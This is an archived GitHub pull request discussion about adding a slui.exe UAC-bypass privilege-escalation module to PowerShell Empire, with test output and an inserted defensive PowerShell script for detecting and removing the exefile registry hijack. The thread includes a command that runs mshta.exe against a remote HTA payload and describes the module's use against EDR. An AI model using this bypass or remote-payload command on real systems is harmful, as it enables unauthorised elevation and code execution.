This repository has been archived by the owner on Jan 29, 2020. It is now read-only.

Windows Local Privilege Escalation Module - SLUI BypassUAC #1243

Open: wants to merge 9 commits into base: dev

Conversation

Truneski

@Truneski Truneski commented Oct 4, 2018

This is a simple privilege escalation module that was already written in PowerShell by gushmazuko: https://github.com/gushmazuko/WinBypass
It works by simply taking a one-liner (can be any) to execute our PowerShell Empire payload, and we get a high-privilege Empire shell.
Hopefully this helps someone out there like it did on my engagement today.
If you have any questions, feel free to ping me on Twitter/Slack, and also feel free to improve it in any way, shape or form.

xorrior and others added 9 commits May 16, 2018 14:49
Change workspace Slack
This will add support for fiddle which is recommended instead of 'DL'. Versions 2.3 and above will use Fiddle, while versions before that will use DL. This will log stderr to logfile as well instead of outputting to terminal (better opsec)
@ThePirateWhoSmellsOfSunflowers
Contributor

ThePirateWhoSmellsOfSunflowers commented Oct 4, 2018

Hi,

Unfortunately, your module fails on my lab.

On my W10 test machine:
[Screenshot attached: screenshot from 2018-10-04 21-38-59]

On Empire side:

(Empire: powershell/privesc/bypassuac_slui) > Job started: G2XR3U


Property      : {}
PSPath        : Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\Software\Classes\exefile\shell\open\command
PSParentPath  : Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\Software\Classes\exefile\shell\open
PSChildName   : command
PSDrive       : HKCU
PSProvider    : Microsoft.PowerShell.Core\Registry
PSIsContainer : True
SubKeyCount   : 
View          : Default
Handle        : Microsoft.Win32.SafeHandles.SafeRegistryHandle
ValueCount    : 
Name          : HKEY_CURRENT_USER\Software\Classes\exefile\shell\open\command

DelegateExecute : 
PSPath          : Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\Software\Classes\exefile\shell\open\command
PSParentPath    : Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\Software\Classes\exefile\shell\open
PSChildName     : command
PSDrive         : HKCU
PSProvider      : Microsoft.PowerShell.Core\Registry

Am I missing something ?

🌻
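The Empire output above shows what the module touches on the target: it creates HKCU\Software\Classes\exefile\shell\open\command and writes a DelegateExecute value under it. Because HKEY_CLASSES_ROOT merges HKCU\Software\Classes over the machine-wide HKLM\Software\Classes, a per-user copy of the exefile handler overrides the real one without needing admin rights, and that is the hook the slui.exe bypass relies on. The following PowerShell helper is an added example for this thread, not code from the PR, from Empire or from WinBypass: it audits that one key and, on request, removes it the way an operator or responder would after the bypass has run. The function names, the output object and the choice to remove the whole HKCU\Software\Classes\exefile subtree are assumptions made for this example; on a clean profile the key is normally absent, so its mere presence is the first thing worth flagging.

```powershell
# Added audit/cleanup example; not part of the Empire module or of WinBypass.
# Assumption: the only per-user key of interest is the one visible in the
# thread's Empire output, HKCU\Software\Classes\exefile\shell\open\command.
# Everything else (function names, the result object) is made up for this example.

$ExefileHijackKey = 'HKCU:\Software\Classes\exefile\shell\open\command'

function Test-ExefileHandlerHijack {
    <#
    .SYNOPSIS
    Reports whether the current user has a private exefile open handler.
    A clean profile has no such key at all; HKEY_CLASSES_ROOT falls back to
    HKLM\Software\Classes for exefile. Any HKCU copy is a user-writable
    override and deserves a look, whatever its values contain.
    #>
    [CmdletBinding()]
    param([string]$Path = $ExefileHijackKey)

    if (-not (Test-Path -LiteralPath $Path)) {
        return [pscustomobject]@{
            Present         = $false
            Command         = $null
            DelegateExecute = $null
            Suspicious      = $false
        }
    }

    $key = Get-Item -LiteralPath $Path
    # GetValue('') returns the (default) value; GetValue on a missing name returns $null,
    # so an empty string here means the value exists but is empty (what the output above shows).
    $command  = $key.GetValue('')
    $delegate = $key.GetValue('DelegateExecute')

    [pscustomobject]@{
        Present         = $true
        Command         = $command
        DelegateExecute = $delegate
        # Presence alone is enough to flag; a populated command or any
        # DelegateExecute value just makes the finding more concrete.
        Suspicious      = $true
    }
}

function Remove-ExefileHandlerHijack {
    <#
    .SYNOPSIS
    Deletes the per-user exefile class so HKCR falls back to the HKLM handler.
    Supports -WhatIf so the responder can see what would be removed first.
    #>
    [CmdletBinding(SupportsShouldProcess = $true)]
    param([string]$ClassRoot = 'HKCU:\Software\Classes\exefile')

    if (-not (Test-Path -LiteralPath $ClassRoot)) {
        Write-Verbose "Nothing to remove: $ClassRoot does not exist."
        return $false
    }
    if ($PSCmdlet.ShouldProcess($ClassRoot, 'Remove per-user exefile handler override')) {
        Remove-Item -LiteralPath $ClassRoot -Recurse -Force
        return $true
    }
    return $false
}

# Usage: audit first, then clean up only if something is there.
$finding = Test-ExefileHandlerHijack
$finding | Format-List
if ($finding.Suspicious) {
    Remove-ExefileHandlerHijack -WhatIf   # drop -WhatIf to actually delete
}
```

Run the audit as the user whose profile is in question, since the key lives in that user's HKCU hive; running it from an elevated console that loaded a different profile will look clean. For detection at scale the same key path is what you would watch for with registry auditing (a key creation under HKCU\Software\Classes\exefile by a non-installer process), since the value contents vary with whatever one-liner the operator chose.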

@Truneski
Author

Truneski commented Oct 5, 2018

Hmm, honestly I'm not sure.
What I did was set the command to execute an HTA file, i.e.
set command "c:\windows\system32\mshta.exe http://ip:port/windows.hta"

So keep testing out new things.

@ThePirateWhoSmellsOfSunflowers
Contributor

On another test VM:
[Screenshot attached: uac]

However if I use the ps1 alone, it works.

🌻

@ThePirateWhoSmellsOfSunflowers
Contributor

ThePirateWhoSmellsOfSunflowers commented Oct 5, 2018

Weeeelllllll, I think I misunderstood. From the beginning I tried to use your module like a normal Empire bypass UAC module: launch it and wait for the new agent to pop. But in fact your module takes a command parameter, mandatory but pre-filled with Default (?), hence the random error on my W10 machine.

I think you should rewrite your module in order to keep the bypass UAC module architecture consistent. A privesc module (like a UAC bypass one) has to launch a second agent (an elevated one). It must be easy to implement (see other UAC bypass modules).

🌻

@Truneski
Author

Truneski commented Oct 5, 2018

It's the main hurdle I came across: adding a launcher to automatically execute. However, I urge you or anyone else for that (preferably more skilled than me) to look at the code and make improvements.
I used the module to great effect on an engagement against a top-tier EDR.
Just wanted to submit it here and hopefully see if it can help anyone. That to me will be enough.

@ThePirateWhoSmellsOfSunflowers
Contributor

I'll give a try to implement the correct method, I'll submit a new PR based on this one.

🌻

@Truneski
Author

Truneski commented Oct 8, 2018

Awesome dude, I'd appreciate the help.

7 participants